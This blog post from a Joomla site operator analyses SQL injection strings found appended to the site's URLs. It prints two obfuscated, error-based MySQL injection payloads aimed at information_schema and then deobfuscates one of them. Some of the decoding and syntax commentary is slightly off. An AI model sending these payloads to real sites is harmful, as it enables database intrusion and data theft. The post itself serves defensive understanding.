Macrotone Blogs

Macrotone blogs upon Joomla, our products and other matters.
Font size: +
2 minutes reading time (356 words)

SQL Injection Attacks

mysqlWe are experiencing a spate of SQL injection attacks upon our site.

These take the form of appending SQL strings upon the end of valid URL addresses.  A simple Google search reveals that there are many sites where the examples given below have triggered problems. Two typical strings are shown below: 

(/**/sElEcT+1+/**/fRoM(/**/sElEcT+count(*),/**/cOnCaT((/**/sElEcT(/**/sElEcT+/**/uNhEx(/**/hEx(/**/cOnCaT(0x217e21,0x4142433134355a5136324457514146504f4959434644,0x217e21))))+/**/fRoM+information_schema/**/tAbLeS+/**/lImIt+0,1),floor(rand(0)*2))x+/**/fRoM+information_schema/**/tAbLeS+/**/gRoUp/**/bY+x)a)   

Or

+or+1=(/**/sElEcT+1+/**/fRoM(/**/sElEcT+count(*),/**/cOnCaT((/**/sElEcT(/**/sElEcT+/**/uNhEx(/**/hEx(/**/cOnCaT(0x217e21,0x4142433134355a5136324457514146504f4959434644,0x217e21))))+/**/fRoM+information_schema/**/tAbLeS+/**/lImIt+0,1),floor(rand(0)*2))x+/**/fRoM+information_schema/**/tAbLeS+/**/gRoUp/**/bY+x)a)+and+1=1   

As one can see the code is specifically targeting MySQL databases.  We presume that they would then, If successful, make further attempts to obtain more information to make a more specific targeted attack.

 

Note also the use of mixed case in the SQL strings used as an attempt to bypass simple selection tests that may/may not be used to detect these types of attack.

Looking at the first example in more detail we can first convert the hexadecimal strings to text and also change case of obvious SQL statements to make easier reading:

Converting the strings gives:   0x4142433134355a5136324457514146504f4959434644 converts to:   ?ABC145ZQ62DWQAFPOIYCFD

And 0x217e21  becomes:  ?!~!?

This gives us the following:

(/**/select+1+/**/from(/**/select+count(*),/**/concat((/**/select(/**/select+/**/unhex(/**/hex(/**/concat(?!~!?, ?ABC145ZQ62DWQAFPOIYCFD,  ?!~!?))))+/**/from+information_schema/**/tables+/**/lImit+0,1),floor(rand(0)*2))x+/**/from+information_schema/**/tables+/**/group/**/by+x)a) 

The next step is to change the ‘+’signs to spaces, since these are used to concatenate the different word together.

(/**/select 1 /**/from(/**/select count(*),/**/concat((/**/select(/**/select /**/unhex(/**/hex(/**/concat(?!~!?, ?ABC145ZQ62DWQAFPOIYCFD,  ?!~!?)))) /**/from information_schema/**/tables /**/lImit 0,1),floor(rand(0)*2))x /**/from information_schema/**/tables /**/group/**/by x)a) 

Take out the ‘/**/’ comment block strings [Why add the comment blocks anyway since they seem to add nothing, other than perhaps to make some form of obscurification!] and we start to see something more sensible:

(select 1 from(select count(*), concat(( select( select unhex(hex( concat(?!~!?, ?ABC145ZQ62DWQAFPOIYCFD,  ?!~!?)))) from information_schema tables lImit 0,1),floor(rand(0)*2))x from information_schema tables group by x)a) 

It is ironic that there appears to be syntax errors in the original source. (Two of which are identical!)

Not quite sure what the significance of the hex strings are currently.

There is something very sad about a situation where certain individuals have nothing better to do with their time than waste it trying to disrupt others efforts to disseminate information and knowledge sharing to those interesting in improving themselves.   Even more so since, if they crafted the SQL themselves they have a certain amount of SQL skills which could be employed to better use.

×
Stay Informed

When you subscribe to the blog, we will send you an e-mail when there are new updates on the site so you wouldn't miss them.

Reflections on Joomla
CSS: text wrapping in a table cell. word-wrap
 
Go To Top

Joomla! Debug Console

Session

Profile Information

Memory Usage

Database Queries